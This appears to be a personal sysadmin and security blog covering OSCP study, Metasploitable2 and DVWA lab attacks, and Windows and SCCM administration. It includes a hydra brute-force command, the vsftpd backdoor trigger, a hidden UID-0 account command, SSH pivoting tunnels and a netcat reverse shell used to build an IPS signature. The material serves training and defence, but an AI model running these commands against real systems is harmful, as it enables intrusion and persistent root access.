Wednesday, December 23, 2015

Reset Linux Root Password

You can reset your password following the next steps:

Reboot your computer / Turn your computer on.
Hold down the Shift key at the start of the boot process to enable the GNU GRUB boot menu (if it does not show)
Press ESC at the GNU GRUB prompt.
Press e for edit.
Use the Arrow keys to highlight the line that begins with kernel and press the e key.
Go to the very end of the line and add rw init=/bin/bash
Press Enter and then press b to boot your system.
Your system will boot up to a passwordless root shell.
Type in "passwd root"
Set your new password.
Restart your system.

Tuesday, October 13, 2015

Python Exploits - Generate all hex chars to find badchars

While preparing for my OSCP exam, I'm reviewing the buffer overflow lessons and needed an easy way to generate all hex characters to test for bad characters in my exploit. Using "print("\\x" + format(x, 'x'))" results in a character on each line, and adding a comma after the print statement keeps it all on the same line, but the output has spaces between characters. You can generate the output you need, all on the same line and without spaces using "sys.stdout.write".

Here's a simple python snippet to do that:

Monday, September 14, 2015

DVWA brute force login with hydra

hydra <IP-Address> -l admin -P /root/scripts/recon_enum/wordlists/passlist http-get-form "/dvwa/vulnerabilities/brute/index.php:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=5b1c46ae203ccb0dcbf8fc3390e276d2"
Replace <IP-Address> with the target's IP address.

The username is "-l admin". Replace the username as necessary, and if you're using a user list, change the parameter to "-L /path/to/userlist.txt".

Change the PHPSESSID to one you capture with Wireshark, Burp, ZAP, etc when you manually enter a login/password.

Notice the while the request url has is typically "/dvwa/vulnerabilities/brute/?username=user&password=pass&Login=Login", in hydra you need to specify "index.php" between "/brute/" and the "?", and you replace the "?" with ":".

Wednesday, September 9, 2015

Metasploitable 2 Java RMI Server exploit

Metasploitable 2 Java RMI Server Insecure Default Configuration Java Code Execution
Vulnerability details:

Samba username map script Command Execution

Command execution vulnerability in Samba versions 3.0.20 through 3.0.25rc3 when using the non-default "username map script" containing shell meta characters, attackers can execute arbitrary command. No authentication is required to exploit this vulnerability!

Metasploitable2 Walkthrough without Metasploit - PHP 5 2 4 RCE

Exploiting Metasploitable2 Debian PRNG Bruteforce SSH

After my OffSec PWK lab time ran out, I'm working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

Port 22, SSH:
Debian OpenSSL - Predictable PRNG Bruteforce SSH Exploit

Note: I had to run this exploit multiple times before it found the right key. I found a blog post that gave Metasploitable2's root key that worked. That key was in the key directory, it works to login, but the exploit wasn't finding it. After some searching I read a blog post about pwnos by g0tM1lk that says sometimes it fails to find the key.

After running this exploit for the third time if finally finds the key and prints the command to run to ssh to Metasploitable2 as root without password.

Exploiting Metasploitable2 without Metasploit - VSFTPD v2.3.4

After my OffSec PWK lab time ran out, I'm working on exploiting vulnerabilities without using Metasploit beyond use of exploit/multi/handler in preparation for the OSCP exam.

On port 21, VSFTPD v2.3.4 is vulnerable to backdoor command execution.

End the username with a smiley ":)" and input any password and then connect to port 6200 for a root shell.

Tuesday, August 18, 2015

How to use ssh pivoting with Metasploit exploits that require SRVHOST/SRVPORT and LHOST/LPORT

In my quest to get ssh pivoting working with Metasploit exploits, I found many examples of how to add routes and pivot through Metasploit. What I couldn't find were examples on how to do this with exploits and payloads that require both SRVHOST/SRVPORT and LHOST/LPORT. An example of this is when the target only has port 3389 open, so you need a reverse payload to connect through your pivot host to you when hooking a browser.

When I used an established meterpreter session, backgrounded it, and entered "route add x.x.x.x x.x.x.x 1" to enter a route, when I ran an exploit using the meterpreter pivot host IP/Port for LHOST/LPORT for the payload reverse connection, metasploit would establish the LHOST/LPORT listener but would error out on the SRVHOST/SRVPORT listener when using the meterpreter pivot host IP address.

My pivot host that I have a meterpreter session on has IP address, my Kali vm has IP address 192.168.x.x, and I'm trying to lure victim to my Metasploit browser exploit server. Host doesn't have a route to my Kali host, so a pivot is required.

In the exploit settings, if I used for SRVHOST and LHOST, Metasploit would establish a server for the LHOST (reverse payload IP address) using the IP address of the meterpreter session host, but would throw errors for the SRVHOST IP address if it wasn't on my local machine. (I'm running this on Kali 2.0 if it makes any difference.)

What ended up working for me:

On Kali and your pivot host, make sure that you "echo "GatewayPorts yes" >> /etc/ssh/sshd_config" and restart the ssh service first to allow the listeners on (listening on all IP addresses), otherwise it will bind to and the port will be unreachable to the victim.

When pivoting to another network and using any exploit that requires SRVHOST/SRVPORT and LHOST/LPORT, I setup two reverse ssh tunnels with:
ssh -R 10.x.x.xPivotHostIP:8000:KaliIPaddress:8001 username@pivothostIP
ssh -R 10.x.x.xPivotHostIP:9000:KaliIPaddress:9001 username@pivothostIP
... and set my SRVHOST/SRVPORT as KaliIPaddress/8001 and LHOST/LPORT as KaliIPaddress/9001.

I set the URIPATH to "/", and lured the victim to http://10.x.x.xPivotHostIP:8000/ which would get tunneled through ssh to KaliIPaddress:8001

I wasn't able to establish two ssh tunnels with the same username as the first session would disconnect when I established the second, so I created another user first. You can create a root user from a non-interactive session with:

useradd -ou 0 -g 0 username
echo "username:password"|chpasswd

Wednesday, May 20, 2015

Privilege escalation and the authenticated users group

While studying for OSCP I learned that while "Program Files" and "Program Files (x86) directories are secure from non-administrators tampering with files (authenticated user group doesn't have rights), any directory/file created by a user under the root of the C drive can be tampered with because by default your folder is created with inherited permissions that allow the "Authenticated Users" group Modify rights.

I as well as other admins that I know like to put admin scripts and programs in C:\temp, and all a coworker or attacker has to do is edit a script or backdoor/replace a binary to get malicious code to run. For example, a help desk tech could have themselves added to domain admins group by adding "net group "Domain\Domain Admins" username /add" to one of my scripts.

Any time you create a directory under the root of the C drive, make sure that you remove inherited permissions and delete the "Authenticated Users" group from the permissions. If you have XAMPP, Python, etc. installed to C:\, think about what I just said. The XAMPP control panel has options to run as a service with SYSTEM privileges, and it's possible for any authenticated user to replace the binaries or scripts for it.

Tuesday, May 19, 2015

Thursday, May 7, 2015

Preparing for OffSec PWK course and OSCP

I'm currently enrolled in Offensive Security's Pentesting with Kali (PWK) course for the OSCP certification now an OSCP. I see questions on how to prepare for the PWK course and OSCP certification exam repeatedly on Reddit and elsewhere.

The PWK course will teach you everything you need to know to pass the OSCP exam. Well, the course as well as many frustrating hours of googling to solve a problem! HaHa! Seriously, if you want to save yourself some time in the labs and avoid having to pay for lab extensions then read on.

Here's my six-step process for anyone to prepare for the course:
  1. Learn linux and be comfortable working from the command line. Download and run Kali from the bootable ISO or the virtual machine. Learn how to navigate from the cli, and how to edit files with nano and vim, how to use chmod to make your scripts executable.
  2. Learn Bash scripting. You're going to need it. Make sure you know how to do things like do an nmap scan for a particular open port and output to grepable format, pipe that output to grep and cut, and then run another command on those IP addresses.
  3. Learn Python. I used and found it to be a good, interactive resource for learning Python.
  4. Learn how to automate Nmap scans and other cli tools with Python. There are many ways to interact with Nmap from Python including libnmap and python-nmap, but I found subprocess.check_output() to be the easiest for a Python newb to understand and implement.
  5. Read Mike Czumak's review of the OSCP, which includes a download for I found that recon-scan won't work as-is due to hard coding of file paths in the scripts, but they are an excellent and easy to understand source of info for a Python newb to learn how to use Python to interact with Nmap and other cli tools. After learning the basics of Python, read Mike's recon-scan scripts to see how he implemented subprocess.check_output() to interact with cli tools.
  6. Get familiar with tcpdump and filters.
While you can get through the course with very basic scripting skills, where I believe that sharpening your Bash/Python/Ruby skills will come in handy is during the final exam where you will be in a time crunch to pop as many boxes as possible to earn enough points to pass. Use the scripting skills you learn in advance of the course to accomplish as many of the PWK exercises as possible. For example once you learn how to run onesixtyone, do the exercise over again and use Bash/Python/Ruby to automate scanning all of your target IP addresses.

Best of luck, and TRY HARDER!


I passed the OSCP exam in October 2015, and the OSWP exam in January 2016.

In the PWK labs and exam, pay attention to detail. On the lab hosts where you get an easy win (MS08-067), you may be tempted to get the proof.txt and move on to the next target. ALWAYS take your time and look for more clues! There are some hosts that you won't get without finding clues on other hosts that you've already hacked. Take a packet capture while you're there too and save it for later! There's a portable version of Wireshark that doesn't require installation that I recommend for taking pcaps on Windows hosts. Download it in advance and have it in your arsenal.

Re-hashing what I said above, learn Bash and Python and practice automating your scans and chaining scans and brute force attacks based on open ports. In the final exam you'll be pressed for time, so have your scripts scanning, dirbusting, and brute forcing password attacks while you're working on the first target.

Take good notes! I started out with KeepNote, and later in the labs I put my notes in Microsoft OneNote. I realized that I was wasting too much time looking through my notes to find a certain command syntax, or how I did something previously. OneNote is searchable and also has a client for every device, including a web interface you can use in Kali. While you need good screenshots for your report, I also copy/pasted the text output from my commands, Metasploit, etc. and pasted that in my notes so that I could have more text to search on.

Edit: KeepNote is now searchable. The version of Kali downloaded for the course when I started had a version that wasn't searchable.

On test day, read the exam guide carefully and then read it again! Don't fail the test because you were in a hurry to get started and overlooked an important detail. Attention to detail and persistence are essential to earning the OSCP.

Good luck! Try harder!

Friday, April 17, 2015

Citrix admins prepare for NPAPI being disabled by Google Chrome

To improve Chrome’s security and stability, Google announced late last year that NPAPI plugin support, a capability we’ve depended on for years, will be disabled by default in Chrome in April 2015. The NPAPI plugin that Receiver for Windows and Mac install enables Receiver for Web to detect that Receiver is installed and enables users to launch applications simply by clicking on them. The removal of NPAPI support will affect user experience for users who access Citrix Receiver for Web using the Chrome browser on Windows and Mac.
After first making a backup of my files, I edited the files referenced in this Citrix article. While testing I noticed that regardless if Receiver is installed, opening the StoreWeb site in Chrome used HTML5 to open the published application in a new browser tab. Opening the site in Internet Explorer used Receiver if installed, otherwise it uses HTML5 if your site is configured for it.

We already have quite a few users using our Citrix site in a browser despite having Receiver installed because that's the way they are used to using it. I'm not going to change things on them now. I restored the original files and kept a copy of the edited to use when Google finally kills off NPAPI plugin support in September 2015. Then when users start reporting access issues with Chrome I'll be ready.

Thursday, April 9, 2015

Can't send email more than 500 miles

I stumbled upon this humorous post this morning and thought you may enjoy it.

From: Trey Harris <>

Here's a problem that *sounded* impossible...  I almost regret posting
the story to a wide audience, because it makes a great tale over drinks
at a conference. :-)  The story is slightly altered in order to protect
the guilty, elide over irrelevant and boring details, and generally make
the whole thing more entertaining.

I was working in a job running the campus email system some years ago
when I got a call from the chairman of the statistics department.

"We're having a problem sending email out of the department."

"What's the problem?" I asked.

"We can't send mail more than 500 miles," the chairman explained.

I choked on my latte.  "Come again?"

"We can't send mail farther than 500 miles from here," he repeated.  "A
little bit more, actually.  Call it 520 miles.  But no farther."

"Um... Email really doesn't work that way, generally," I said, trying
to keep panic out of my voice.  One doesn't display panic when speaking
to a department chairman, even of a relatively impoverished department
like statistics.  "What makes you think you can't send mail more than
500 miles?"

"It's not what I *think*," the chairman replied testily.  "You see, when
we first noticed this happening, a few days ago--"

"You waited a few DAYS?" I interrupted, a tremor tinging my voice.  "And
you couldn't send email this whole time?"

"We could send email.  Just not more than--"

"--500 miles, yes," I finished for him, "I got that.  But why didn't
you call earlier?"

"Well, we hadn't collected enough data to be sure of what was going on
until just now."  Right.  This is the chairman of *statistics*. "Anyway,
I asked one of the geostatisticians to look into it--"


"--yes, and she's produced a map showing the radius within which we can
send email to be slightly more than 500 miles.  There are a number of
destinations within that radius that we can't reach, either, or reach
sporadically, but we can never email farther than this radius."

"I see," I said, and put my head in my hands.  "When did this start?
A few days ago, you said, but did anything change in your systems at
that time?"

"Well, the consultant came in and patched our server and rebooted it.
But I called him, and he said he didn't touch the mail system."

"Okay, let me take a look, and I'll call you back," I said, scarcely
believing that I was playing along.  It wasn't April Fool's Day.  I
tried to remember if someone owed me a practical joke.

I logged into their department's server, and sent a few test mails.
This was in the Research Triangle of North Carolina, and a test mail to
my own account was delivered without a hitch.  Ditto for one sent to
Richmond, and Atlanta, and Washington.  Another to Princeton (400 miles)

But then I tried to send an email to Memphis (600 miles).  It failed.
Boston, failed.  Detroit, failed.  I got out my address book and started
trying to narrow this down.  New York (420 miles) worked, but Providence
(580 miles) failed.

I was beginning to wonder if I had lost my sanity.  I tried emailing a
friend who lived in North Carolina, but whose ISP was in Seattle.
Thankfully, it failed.  If the problem had had to do with the geography
of the human recipient and not his mail server, I think I would have
broken down in tears.

Having established that -- unbelievably -- the problem as reported was
true, and repeatable, I took a look at the file.  It looked
fairly normal.  In fact, it looked familiar.

I diffed it against the in my home directory.  It hadn't been
altered -- it was a I had written.  And I was fairly certain
I hadn't enabled the "FAIL_MAIL_OVER_500_MILES" option.  At a loss, I
telnetted into the SMTP port.  The server happily responded with a SunOS
sendmail banner.

Wait a minute... a SunOS sendmail banner?  At the time, Sun was still
shipping Sendmail 5 with its operating system, even though Sendmail 8 was
fairly mature.  Being a good system administrator, I had standardized on
Sendmail 8.  And also being a good system administrator, I had written a that used the nice long self-documenting option and variable
names available in Sendmail 8 rather than the cryptic punctuation-mark
codes that had been used in Sendmail 5.

The pieces fell into place, all at once, and I again choked on the dregs
of my now-cold latte.  When the consultant had "patched the server," he
had apparently upgraded the version of SunOS, and in so doing
*downgraded* Sendmail.  The upgrade helpfully left the
alone, even though it was now the wrong version.

It so happens that Sendmail 5 -- at least, the version that Sun shipped,
which had some tweaks -- could deal with the Sendmail 8, as
most of the rules had at that point remained unaltered.  But the new
long configuration options -- those it saw as junk, and skipped.  And
the sendmail binary had no defaults compiled in for most of these, so,
finding no suitable settings in the file, they were set to

One of the settings that was set to zero was the timeout to connect to
the remote SMTP server.  Some experimentation established that on this
particular machine with its typical load, a zero timeout would abort a
connect call in slightly over three milliseconds.

An odd feature of our campus network at the time was that it was 100%
switched.  An outgoing packet wouldn't incur a router delay until hitting
the POP and reaching a router on the far side.  So time to connect to a
lightly-loaded remote host on a nearby network would actually largely be
governed by the speed of light distance to the destination rather than by
incidental router delays.

Feeling slightly giddy, I typed into my shell:

$ units
1311 units, 63 prefixes

You have: 3 millilightseconds
You want: miles
        * 558.84719
        / 0.0017893979

"500 miles, or a little bit more."

Trey Harris
I'm looking for work.  If you need a SAGE Level IV with 10 years Perl,
tool development, training, and architecture experience, please email
me at  I'm willing to relocate for the right opportunity.

Friday, March 13, 2015

Using SCCM Task Sequences to perform complex application upgrades

In System Center Configuration Manager (SCCM) applications are typically deployed and managed in one of two ways: Applications and Packages.

Sometimes you need something a little more powerful. When we originally installed KwikTag, it didn't have an installer. It was a folder that had to be copied to the computers and run a batch file to register the dll's. Now we need to upgrade, which involves unregistering the dll's, deleting files out of each user's %appdata% folder, and finally deleting the folder out of "Program Files". If that weren't enough, the upgrade must include logic for "Program Files" as well as "Program Files (x86)", and I have a mix of computers with the old version, the new version, and no version installed.

Normally SCCM Task Sequences are for operating system deployment, but you can use them for much more.

When creating the Task Sequence, choose "New custom task sequence" and do not choose a boot disk.

Here's my overall "Upgrade KwikTag" Task Sequence:

You'll notice that I grouped the steps and used an "If" condition to specify to only run the TS if none of the conditions are true, as in only if the new version of the application is not installed. For all except the Install and Restart, I checked "Continue on Error" which covers those cases in which the program was never installed and the files don't exist.

My Powershell script loops through the all user's %appdata% folder and cleans up the files.

Thursday, March 12, 2015

Hacking the network with Scapy and Python

I've been learning Python for infosec work. Scapy is built on Python and allows you to interact with the network at a much lower level than the Python sockets library. If I were to say it allows you to build your own packets/frames that would be an understatement.

From the Scapy home page:

What is Scapy

Scapy is a powerful interactive packet manipulation program. It is able to forge or decode packets of a wide number of protocols, send them on the wire, capture them, match requests and replies, and much more. It can easily handle most classical tasks like scanning, tracerouting, probing, unit tests, attacks or network discovery (it can replace hping, 85% of nmap, arpspoof, arp-sk, arping, tcpdump, tethereal, p0f, etc.). It also performs very well at a lot of other specific tasks that most other tools can't handle, like sending invalid frames, injecting your own 802.11 frames, combining technics (VLAN hopping+ARP cache poisoning, VOIP decoding on WEP encrypted channel, ...), etc. See interactive tutorial and the quick demo: an interactive session (some examples may be outdated).

What makes scapy different from most other networking tools

First, with most other tools, you won't build someting the author did not imagine. These tools have been built for a specific goal and can't deviate much from it. For example, an ARP cache poisoning program won't let you use double 802.1q encapsulation. Or try to find a program that can send, say, an ICMP packet with padding (I said padding, not payload, see?). In fact, each time you have a new need, you have to build a new tool.
Second, they usually confuse decoding and interpreting. Machines are good at decoding and can help human beings with that. Interpretation is reserved to human beings. Some programs try to mimic this behaviour. For instance they say "this port is open" instead of "I received a SYN-ACK". Sometimes they are right. Sometimes not. It's easier for beginners, but when you know what you're doing, you keep on trying to deduce what really happened from the program's interpretation to make your own, which is hard because you lost a big amount of information. And you often end up using tcpdump -xX to decode and interpret what the tool missed.
Third, even programs which only decode do not give you all the information they received. The network's vision they give you is the one their author thought was sufficient. But it is not complete, and you have a bias. For instance, do you know a tool that reports the padding ?
Scapy tries to overcome those problems. It enables you to build exactly the packets you want. Even if I think stacking a 802.1q layer on top of TCP has no sense, it may have some for somebody else working on some product I don't know. Scapy has a flexible model that tries to avoid such arbitrary limits. You're free to put any value you want in any field you want, and stack them like you want. You're an adult after all.
In fact, it's like building a new tool each time, but instead of dealing with a hundred line C program, you only write 2 lines of Scapy.
After a probe (scan, traceroute, etc.) Scapy always gives you the full decoded packets from the probe, before any interpretation. That means that you can probe once and interpret many times, ask for a traceroute and look at the padding for instance.

Here are my notes on Scapy. For detailed usage examples see the link below.

  • The ls() command shows a list of all available protocols.
    • For a listing of individual protocol options and defaults, use ls(protocol). For example ls(TCP)
  • To see a list of scapy commands: lsc()
  • Packets need to be created from a header perspective:
    • Ethernet | IP | TCP/UDP | Application
    • Ether()/IP()/TCP()/Data
  • Send a layer 3 packet ICMP example: (scapy handles the ethernet frame for you)
    • pkt = IP(dst="")/ICMP()/"data")
    • send(pkt)
  • To send a layer 3 TCP packet, you must add a port.
    • pkt = IP(dst="")/TCP()/(dport=23))
  • For an easier to read format of your sent or received packet, use:
  • To add a layer 2 frame you must add the ethernet header and include the interface. Note that we are now using sendp vs send.
    • example: sendp(Ether()/IP(dst="")/ICMP()/"data", iface="eth0")
  • Sending a packet repeatedly:
    • sendp(Ether()/IP(dst="")/ICMP()/"data", iface="eth0", loop=1)
  • To add a sending interval: (Interval is seconds)
    • sendp(Ether()/IP(dst="")/ICMP()/"data", iface="eth0", inter=1)
  • So far we have only seen the sent packets. To send and receive:
    • Layer 3:
      • sr() returns answers and unanswered packets
        • sr(IP(dst="")/ICMP()/"data")
      • To see the response (or lack of)
        • response, no_response = _
        • response[0]
        • no_response[0]
        • In Python,  the "_" variable is used to store the result of the last evaluation.
      • sr1() returns only answer or sent packets (1 packet)
    • Layer 2:
      • srp()
      • srp1()
  • You can manipulate the routing table in scapy without affecting the global routing table which is useful when you have a multihomed host.
    • Show the routing table: conf.route
    • add a host route: conf.route.add(host="", gw="")
    • add a network route: conf.route.add(net="", gw="")
    • To reset scapy's routing table: conf.route.resync()
  • Packet sniffing: pkts = sniff(iface="eth0", filter="arp", count=3)
    • Allows the use of bpf (Berkely packet filters)
    • Save sniffed packets to a file: pkts = sniff(offline="offline.pcap")
    • Print packets live while sniffing:
      • pkts=sniff(iface="eth0", filter="arp", count=20, prn=lambda x: x.summary())
  • Write packets to a pcap file: wrpcap("demo.pcap", pkts)

  • Read packets from a pcap file: rdpcap("demo.pcap")

Update KB3033929 fails with error code 80004005

KB3033929, Microsoft security advisory: Availability of SHA-2 code signing support for Windows 7 and Windows Server 2008 R2: March 10, 2015

The process is the same every time:
- downloads and installs the update
- requests a restart
- before shutting down and restarting, it 'Configures Windows' for a while
- after restart, it is 'Preparing to configure Windows', gets to about 72%, reports 'Failure configuring Windows update. Reverting changes'
- restarts automatically
- 'prepares to configure Windows' once again, shows the 'Failure configuring Windows update. Reverting changes' once again
- shows the login screen

While I'm thankful for those that patch immediately on Patch Tuesday as they sound the alarm for the rest of us, it's insane for anyone who is responsible for business computers to do so. I've been in IT for going on 10 years next month, and I've never had a single issue with Microsoft updates because I don't even begin to test them until a few days after release, with the exception of exceptionally critical security updates. That gives Microsoft enough time to pull any updates that cause issues before my systems get them.

Edit: I've seen some reports of dual booting Windows/Linux systems having an issue with this update, and either unplugging the Linux drive or changing your system to only boot to Windows may fix it. I've seen reports of others that do not dual boot having a problem with this patch as well.

Rvnlord suggests the following to fix the issue on computers without a dual boot (grub):

1. Open directory where is the file mentioned in the error, in my case: "C:\Windows\WinSxS\amd64_microsoft-windows-b..vironment-os-loader_31bf3856ad364e35_6.1.7601.18741_none_b9293c0383618646\winresume.exe"
2. Right Click on the file > Properties > Security > Advanced > Owner > (Set it to your Account) > OK
3. In previous Window: Edit > Add
4. You need to add two accounts
- "NT SERVICE\TrustedInstaller"
5. Give them both Read, Write, Execute permissions. > OK
6. Now KB3033929 which is one big nightmare should install without any problems and ask you to restart your computer afterwards.

For computers dual booting Windows and Linux using Grub, boot into Linux and turn the Linux active flag on the partition off. When you reboot you should go directly into Windows and the update should install successfully. You will have to use a Linux boot CD to turn the active flag on for the Linux partition to restore access.

Wednesday, March 11, 2015

GoToMeeting FREE

Free · No sign up · Screen sharing · Up to 3 people

I read the FAQ's and couldn't find a "catch". It did say it's experimental, so it is possible that the free offer can end in the near future.

If you've used free GoToMeeting I'd like to hear about your experience.

Using Powershell to update the hosts file on remote computers

Today I had the need to edit the hostfile on all the computers in a particular Active Directory OU.

I had previously set entries in the hosts file in a small remote office to test some system changes before rolling out the changes to everyone via DNS.

I edited my own hosts file and then ran this Powershell script to copy it to all computers in the target OU.

Import-Module ActiveDirectory
$Comps = Get-ADComputer -SearchBase 'OU=Comp,OU=OUname,DC=domainname,DC=com' -Filter '*' | Select -ExpandProperty Name
$source = "C:\Windows\System32\drivers\etc\hosts"
$path = "Windows\System32\drivers\etc\hosts"
$hamptonComps | foreach {Copy-Item $source -Destination \\$_\c$\$path}

Thursday, March 5, 2015

Kali Linux 1.1 image for Raspberry Pi 2

There has been a lot of talk around (Reddit) about Kali Linux 1.1 for the latest Raspberry Pi version 2. There were instructions around on how to build it yourself. If you want to download the official image from Offensive Security, get it here.

The image doesn't have raspi-config preinstalled. If you're not familiar, raspi-config is a configuration tool that makes it easy to expand your filesystem, overclock, activate a camera, set the hostname, and more.

To install raspi-config:

dpkg -i triggerhappy_0.3.4-2_armhf.deb
dpkg -i lua5.1_5.1.5-4+deb7u1_armhf.deb
dpkg -i raspi-config_20150131-1_all.deb

Once you've run raspi-config, expanded your filesystem and restarted, you may want to install more Kali packages as the image comes with very little preinstalled and it doesn't have the traditional Kali menu. Here's how to add Kali metapackages.

Update: I'm finding broken applications after an "apt-get install kali-linux-full". I ran "service metasploit start" and got an error "unknown service". Running "apt-get install metasploit" should fix that, even though metasploit was already in the Kali menu.

Thursday, January 29, 2015

SCCM client doesn't connect to the local SMP during OSD

I recently noticed that one of my computers was connecting to an SMP/DP across a T1 to a remote office to store user state during OSD. After reviewing the logs I saw that it was connecting to the local DP for content, but not for user state storage.

I couldn't find anything in the logs that explained this behavior, and I checked my boundaries and boundary groups and everything looked good. After failing to resolve this on my own over a few days, I opened a ticket with Microsoft support.

It turns out that while using boundaries to connect a client to the local DP is a feature, connecting to the SMP at the local site is not and the client can connect to any writable SMP, even if its across your slowest WAN connection to a remote office.

You have two options to avoid having the client connect across the WAN for user state storage; check "Enable restore-only mode" in your State Migration Point properties under Administration > Servers and Site System Roles, or check "Capture locally by using links instead of copying files" under the "Capture User Files and Settings" step in your OSD.

Enabling restore-only mode will prevent the SMP from being used to store user state, and user state already stored on the SMP is still available. The problem with this approach is that not only will your other sites not use that SMP to store user state, the local clients won't use it either so they will be sending user state across the WAN to another SMP. You may have to enable or disable this setting as needed, for example if you are imaging multiple workstations in the same office you could enable this setting on all other SMP's except the one at the site where computers are being imaged.

Capturing locally by using links instead of copying files would prevent you from having to remember to change the SMP settings frequently as it would be a "set it and forget it" solution which is what I prefer.

Tuesday, January 20, 2015

Creating custom SonicWall IPS signatures

Creating custom SonicWall IPS signatures

I’m going to show how to use Kali Linux and Windows 7 Pro running in VMware Workstation to create a packet capture for the creation of a SonicWall IPS signature to detect a reverse shell. Before writing this article I talked to SonicWall support and asked them if the IPS signatures already detected netcat reverse shells and was told that they do not. After creating this article, I discovered during testing that they actually do. We can still use this article as a reference to create custom IPS signatures in the future so all is not wasted.

On your Kali vm, open a terminal and enter “ncat -l”. This starts ncat listening for our reverse shell on the default port 31337. You may specify a different port: “ncat -l 4444” for example.

In Kali, start Wireshark and make a note of the IP address of the interface you are using for your capture. Start the Wireshark capture.

In Windows, download netcat from and unzip it to the directory of your choice. Open a cmd prompt and either cd to the directory where netcat is extracted, or enter the path with the following command: “nc -e 31337”

On Kali, once the Windows 7 machine connects to our ncat listener you will see your Windows command prompt with the Windows version number. Stop the Wireshark capture. In wireshark, enter a filter to find the right packet: ip.src== and apply it.

Scroll down through the filtered frames until you see:

Click File > Export selected packet, and check “Selected packet only” and save it to your desktop.

I installed the Okteta hex editor in Kali; “apt-get install okteta”. There is a command line hex editor already installed in Kali, however I didn’t want to take the time to learn a cli hex editor since I had a deadline to get this done. I’ll take the time to learn hexedit later.

Open Okteta and open your packet capture that contains the one frame we’re interested in that you previously saved. Highlight the part you see highlighted below since we don’t want to include the directory path in our signature since that may vary. If you use anything beyond “Version 6.1.” then you will need to edit the capture in your hex editor and export a copy for EVERY version of Windows that you need to protect.

Click File > Export > Values, delete out the space in the Separation field to remove the spaces in the Preview field, and click the Export to File button.

To add the new signature, you need to add a new “Match Object”. In the SonicWall web interface, go to Firewall > Match Objects, and at the bottom click “Add new match object”. Enter your object name, I used “Windows Reverse Shell”, Match Object Type should be “Custom Object”, Match Type should be “Exact Match”, Input Representation should be “Hexadecimal”, now paste your hex code you extracted from the hex editor earlier and then click “Add” and then “Ok”.

Create a new app rule:

Thursday, January 15, 2015

Python script to search Cisco CUCM Call Detail Records

If you manage Cisco CUCM and get requests for Call Detail Records, you know how frustrating it can be to have to:
  1. import the csv file to Excel
  2. delete out all but 4 of over 60 columns
  3. search thousands of rows of data to narrow down to the one extension
  4. convert epoch time to something a human understands
The first time I had to fulfill a request for call records, it took me most of the day to figure it out. Before I wrote this script it took me an average of a couple hours. That's two hours too long. With this script and Python installed, you can have a csv file to import into Excel in seconds.

Tuesday, January 13, 2015

Deploying Java 8 update 25 with SCCM

Product: Java 8 Update 25 -- Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor. Action installexe, location: C:\WINDOWS\Installer\MSI789B.tmp, command: /s INSTALLDIR="C:\Program Files (x86)\Java\jre1.8.0_25\\" EULA=0 REPAIRMODE=0

Error 1722. There is a problem with this Windows Installer package. A program run as part of the setup did not finish as expected. Contact your support personnel or package vendor.

Fix: Put this in your Installation program: msiexec /i jre1.8.0_25.msi JU=0 JAVAUPDATE=0 AUTOUPDATECHECK=0 RebootYesNo=No WEB_JAVA=1 /q

Saturday, January 3, 2015

Being true to yourself

I've always had a passion for computer/network security. Looking back, I was a hacker (in the good sense of the word) ever since I bought my first computer. I was in the Navy and used my reenlistment bonus to buy my first computer, a Radio Shack Tandy T1000. I picked it up going into a three-day weekend and spent the whole weekend tinkering with it; taking it apart and putting it back together and ultimately breaking it so badly that phone tech support couldn't help me restore the partition table that I had deleted. I ended up fixing that myself and calling to tell tech support how I did it so that they could add it to their notes.

I not only wanted to know how computers worked, I was also intrigued with how to get computers to do things that were undocumented, like some kind of black magic. I was fascinated with hackers and hacking. Once I discovered VMware Workstation and Server, I was running labs in my garage to learn server OS and security. Meanwhile I was in the Navy as an Aviation Electrician and was raising a family. I never really learned as much as I wanted to about programming and low level operating system details. I just didn't have the time.

During my last tour of duty in the Navy before retiring I managed to work my way into the IT department of the command where I was stationed. I had the right skills, in the right place, and at the right time. I worked my way up from help desk, to system administrator and Assistant Information System Security Manager over that three years. During that time I also finished my degree in Networking and Security Management.

My first (and current) civilian job was "Network Support" and I was promoted to "System Engineer" around two years later. Since then my job has taken me in a direction other than where I had intended. These days I rarely get to work on the networking and security side, and spend most of my time with Citrix, VMware, and System Center Configuration Manager (SCCM). I am very thankful for the opportunities that my employer has given me and the training I've received. I alone am responsible for keeping myself on track to reach my goals, and ultimately the things I've learned outside of security will help me in the long run.

While studying for Citrix and VMware certifications, I realized that I had to push myself to do it. I didn't feel a "pull" to do it so I lacked the motivation to succeed. In evaluating my goals I realized how far I had strayed from my passion for information security. I'm certainly not getting any younger, and I'm feeling a sense of urgency to be true to myself this late in life. While I'm not old, I am on my second career after retiring from the Navy.

I've decided to change my goals to realign myself for my passion for information security. While I've attempted to learn Python in the past, I usually got sidetracked and never completed it. I've found Codeacademy where I'm currently learning Python interactively. I'm also getting back on track by studying for the Certified Ethical Hacker v8 certification. While many people may look down on certifications, I'm using it as a way to stay focused and on track. I'll be posting my study notes here over time for others to use.

Be true to yourself. Its a drag trying to force yourself to stay motivated for something that doesn't make you happy in the long run.